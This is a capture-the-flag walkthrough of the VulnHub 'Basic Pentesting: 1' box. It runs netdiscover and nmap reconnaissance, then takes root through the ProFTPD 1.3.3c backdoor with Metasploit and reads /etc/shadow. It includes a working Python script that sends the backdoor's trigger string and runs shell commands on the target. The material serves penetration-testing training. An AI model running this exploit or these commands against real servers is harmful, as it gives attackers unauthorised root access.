Basic Pentest 1

Hello user

And welcome to my attempt at the Basic Pentesting: 1 box, available from VulnHub here

After setting up and booting the machine I discover it with the netdiscover tool, which watches ARP (Address Resolution Protocol) traffic on the local network segment.

With the -p flag netdiscover passively listens for ARP traffic on my network and reports the hosts it sees, so I can find the box without sending a single packet. Passive mode only ever sees hosts that talk, so if the target stays quiet you can fall back to actively probing the range with netdiscover -r 192.168.128.0/24.

root@kali:~# netdiscover -p

Currently scanning: (passive)   |   Screen View: Unique Hosts

 ________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 ------------------------------------------------------------------------
 192.168.128.12  08:00:27:14:06:50      4     240  PCS Systemtechnik GmbH

Fantastic, it found the IP of the target device. The 08:00:27 MAC prefix (PCS Systemtechnik GmbH) is the VirtualBox OUI, which matches the VM we just booted, so that is our box and not something else on the network. Let's give it a thorough scan with nmap.

I use the following command as my default scan of any new target.

nmap -A -sS -sV -p 1-65535 -T4 192.168.128.12

It tells nmap to TCP SYN scan (-sS) all 65535 ports with aggressive detection (-A turns on OS detection, version detection, the default NSE scripts and traceroute) using timing template 4 (the range runs from 0, paranoid, to 5, insane). Since -A already enables -sV, the explicit -sV is redundant but harmless. A SYN scan needs raw sockets, so this has to run as root, which is why everything below is typed at the root@kali prompt.

We get the following output.

root@kali:~# nmap -A -sS -sV -p 1-65535 -T4 192.168.128.12

Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-13 05:43 EDT
Nmap scan report for 192.168.128.12
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.128.12

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
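Three open ports is easy to eyeball, but on a bigger target you want the port table in a form you can sort and diff. As an added example (mine, not part of the original write-up or of nmap itself), here is a small parser for nmap's normal output that pulls out the port/state/service/version records, checks that the listed ports plus the "Not shown" count add up to the range you asked for with -p (a cheap way to catch a truncated or mis-scoped report), and flags version banners on a watchlist. The sample input is the port table from the scan above, embedded so it runs offline; the WATCHLIST contents are my own illustrative choice.

```python
import re
from typing import List, Tuple

# Sample input: the port table from the nmap run shown above on this page,
# embedded here so the parser runs offline.
NMAP_OUTPUT = """\
Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-13 05:43 EDT
Nmap scan report for 192.168.128.12
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
"""


class Service:
    def __init__(self, port: int, proto: str, state: str, name: str, version: str):
        self.port, self.proto, self.state, self.name, self.version = port, proto, state, name, version


# One port line looks like "21/tcp open  ftp     ProFTPD 1.3.3c". NSE script
# lines start with "|" and the header starts with "PORT", so neither matches.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
NOT_SHOWN = re.compile(r"^Not shown: (\d+) (?:closed|filtered) ports")

# Illustrative watchlist (my choice for this example): version banners that
# deserve a look first, mapped to the reason.
WATCHLIST = {
    "ProFTPD 1.3.3c": "backdoored 1.3.3c distribution tarball (late 2010); "
                      "Metasploit exploit/unix/ftp/proftpd_133c_backdoor",
}


def parse_nmap(text: str) -> List[Service]:
    """Return the port table of an nmap normal-output report as Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
    return services


def port_count_consistent(text: str, ports_scanned: int) -> bool:
    """Listed ports + the 'Not shown' count must equal the ports requested with -p;
    a mismatch means the report was truncated or the scan did not cover the range
    you think it did. (Only the single-count form of 'Not shown' is handled.)"""
    for line in text.splitlines():
        m = NOT_SHOWN.match(line)
        if m:
            return int(m.group(1)) + len(parse_nmap(text)) == ports_scanned
    return False


def triage(services: List[Service]) -> List[Tuple[Service, str]]:
    """Pair each open service whose version banner starts with a watchlist entry
    with the reason it is on the list."""
    hits = []
    for s in services:
        if s.state != "open":
            continue
        for prefix, why in WATCHLIST.items():
            if s.version.startswith(prefix):
                hits.append((s, why))
    return hits


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    for s in found:
        print(f"{s.port}/{s.proto} {s.state} {s.name} {s.version}")
    print("full range covered:", port_count_consistent(NMAP_OUTPUT, 65535))
    for s, why in triage(found):
        print(f"look at {s.port}/{s.proto} first: {why}")
```

For a real engagement you would feed it the saved report (nmap -oN) rather than a pasted string, or better, parse -oX XML; the point here is the habit of checking the numbers add up before trusting the scan.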

OK, so let's start with the FTP (File Transfer Protocol) service nmap detected. ProFTPD 1.3.3c is a notorious version: for a few days in late 2010 the project's distribution server was compromised and the 1.3.3c source tarball was replaced with one carrying a backdoor, so any server built from that download will hand a root shell to anyone who knows the trigger. That looks vulnerable as hell.

Let's fire up Metasploit and see if we can find any exploits for it.

root@kali:~# service postgresql start
root@kali:~# msfdb init
A database appears to be already configured, skipping initialization
root@kali:~# msfconsole


=[ metasploit v4.16.35-dev ]
+ -- --=[ 1732 exploits - 990 auxiliary - 300 post ]
+ -- --=[ 509 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search proftpd 1.3.3c

Matching Modules
================


Yeah, so I'm going to use screenshots from now on; that's way easier, lmao.

Metasploit has a bunch of exploits, but we are going to try the ProFTPD-1.3.3c Backdoor Command Execution one, so we select it by giving its module path to the use command like so.

msf > use exploit/unix/ftp/proftpd_133c_backdoor

Cool. When using Metasploit you can check what needs configuring by typing options. After we type options we can see we only need to set the remote host (target) IP, which we do with set RHOST 192.168.128.12.

After configuring that we run the exploit by typing run or exploit (they do the same thing), and we are informed a shell has opened.

To confirm what privileges we have, use the whoami command, and then, to really drive the point home, try something only the root user could do, like cat (view) /etc/shadow, the file that actually holds the password hashes. (/etc/passwd is readable by every user on the system, so being able to view that one proves nothing about your privileges.)
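Metasploit hides how little this "exploit" actually is, so as an added example (my code, not the Metasploit module and not part of the original write-up) here is the same exchange done by hand: connect to port 21, read the greeting, send the trigger HELP ACIDBITCHEZ (the string the Metasploit module sends), then send a shell command over the same control connection and read back what the root shell prints. So that it runs offline, a constructed stand-in server is included that greets like a 1.3.3c build and answers the trigger plus id with a canned root identity; it executes nothing, and its banner text is an assumption about what a default install prints. Point trigger_backdoor at a real host to use it for real.

```python
import socket
import socketserver
import threading
from typing import Optional, Tuple

# The fixed trigger the Metasploit module sends. Whatever is sent on the control
# connection after it is read by the backdoor's root shell, so it is also a dead
# simple thing to look for on the wire.
TRIGGER = b"HELP ACIDBITCHEZ\r\n"


def is_backdoor_candidate(banner: str) -> bool:
    """The FTP greeting names the version. Only 1.3.3c builds made from the
    tampered tarball carry the backdoor, so this is a reason to try the
    trigger, not proof of anything."""
    return "ProFTPD 1.3.3c" in banner


def _read_line(sock: socket.socket) -> bytes:
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def trigger_backdoor(host: str, port: int, command: str = "id",
                     timeout: float = 5.0) -> Tuple[str, Optional[str]]:
    """Connect, read the banner, and if it looks like 1.3.3c send the trigger
    followed by one shell command. Returns (banner, output); output is None
    when the banner did not qualify and nothing was sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _read_line(s).decode(errors="replace").strip()
        if not is_backdoor_candidate(banner):
            return banner, None
        s.sendall(TRIGGER)
        # "exit" afterwards asks the shell to hang up; if it does not, the
        # socket timeout ends the read instead.
        s.sendall(command.encode() + b"\nexit\n")
        out = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                out += chunk
        except socket.timeout:
            pass
        return banner, out.decode(errors="replace").strip()


class FakeBackdooredProFTPD(socketserver.StreamRequestHandler):
    """Constructed stand-in so the example runs offline. It executes nothing:
    it greets like a 1.3.3c server (banner text assumed), answers the trigger
    followed by `id` with a canned root identity, and refuses anything else."""
    BANNER = b"220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]\r\n"

    def handle(self):
        self.wfile.write(self.BANNER)
        if self.rfile.readline() != TRIGGER:
            self.wfile.write(b"500 Invalid command\r\n")
            return
        cmd = self.rfile.readline().strip()
        if cmd == b"id":
            self.wfile.write(b"uid=0(root) gid=0(root) groups=0(root)\n")
        else:
            self.wfile.write(b"sh: " + cmd + b": not emulated\n")
        # returning closes the connection, like the shell exiting


def start_fake_server() -> Tuple[socketserver.TCPServer, int]:
    """Start the stand-in on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), FakeBackdooredProFTPD)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_fake_server()
    banner, out = trigger_backdoor("127.0.0.1", port)
    print(banner)
    print(out)
    srv.shutdown()
    srv.server_close()
```

Two things worth noticing from the exchange: there is no memory corruption and no payload staging, just a magic word on a clear-text protocol, and the answer to id comes back as uid 0 because the backdoor's shell is the daemon's own root process, which is why the write-up never needs a privilege-escalation step.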

 

Cool, so we got root access very easily and on our first attempt. Part of that is because this is a beginner CTF intended to be easy to compromise, but part of it is the nature of this particular bug: the backdoor sets its uid to 0 before spawning the shell, so the foothold is already root and there is no separate privilege-escalation step. It is very unlikely future CTFs will be this easy, but that's good, or else it would be very boring!

And if ya don't know, now ya know.